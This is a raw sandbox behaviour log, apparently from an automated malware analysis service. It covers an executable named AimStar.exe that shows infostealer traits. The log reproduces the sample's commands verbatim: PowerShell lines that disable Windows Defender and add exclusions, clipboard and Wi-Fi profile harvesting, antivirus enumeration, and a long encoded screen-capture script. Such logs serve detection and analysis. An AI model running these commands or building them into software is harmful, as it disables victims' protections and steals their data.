              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7596:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3364:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8000:120:WilError_03
              Source: C:\Windows\System32\SIHClient.exeMutant created: {376155FF-95A0-46CA-8F57-ACB09EA70153}
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5760:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7636:120:WilError_03
              Source: C:\Users\user\Desktop\AimStar.exeMutant created: \Sessions\1\BaseNamedObjects\L
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8048:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7852:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6688:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7908:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7536:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8060:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7428:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8032:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5440:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7928:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5780:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1996:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7832:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8068:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7476:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5516:120:WilError_03
              Source: C:\Users\user\Desktop\AimStar.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI72842Jump to behavior
              Source: AimStar.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeFile read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\AimStar.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Windows\System32\SIHClient.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\SIHClient.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\SIHClient.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\SIHClient.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: AimStar.exe, 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: AimStar.exe, AimStar.exe, 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: AimStar.exe, AimStar.exe, 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: AimStar.exe, AimStar.exe, 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: AimStar.exe, AimStar.exe, 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: AimStar.exe, AimStar.exe, 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: AimStar.exe, 00000002.00000003.2211316697.000002020D9EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: AimStar.exe, AimStar.exe, 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: AimStar.exeVirustotal: Detection: 36%
              Source: AimStar.exeReversingLabs: Detection: 34%
              Source: AimStar.exeString found in binary or memory: set-addPolicy
              Source: AimStar.exeString found in binary or memory: id-cmc-addExtensions
              Source: AimStar.exeString found in binary or memory: can't send non-None value to a just-started coroutine
              Source: AimStar.exeString found in binary or memory: --help
              Source: AimStar.exeString found in binary or memory: --help
              Source: AimStar.exeString found in binary or memory: fma($module, x, y, z, /) -- Fused multiply-add operation. Compute (x * y) + z with a single round.
              Source: AimStar.exeString found in binary or memory: can't send non-None value to a just-started async generator
              Source: AimStar.exeString found in binary or memory: can't send non-None value to a just-started generator
              Source: AimStar.exeString found in binary or memory: various kinds of output. Setting it to 0 deactivates this behavior. PYTHON_HISTORY : the location of a .python_history file. These variables have equivalent command-line options (see --help for details): PYTHON_CPU_COUNT: override the retu
              Source: AimStar.exeString found in binary or memory: various kinds of output. Setting it to 0 deactivates this behavior. PYTHON_HISTORY : the location of a .python_history file. These variables have equivalent command-line options (see --help for details): PYTHON_CPU_COUNT: override the retu
              Source: C:\Users\user\Desktop\AimStar.exeFile read: C:\Users\user\Desktop\AimStar.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\AimStar.exe "C:\Users\user\Desktop\AimStar.exe"
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Users\user\Desktop\AimStar.exe "C:\Users\user\Desktop\AimStar.exe"
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe'"
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\SIHClient.exe C:\Windows\System32\sihclient.exe /cv QZj+5JUF0k+XXwZK8rpr7Q.0.2
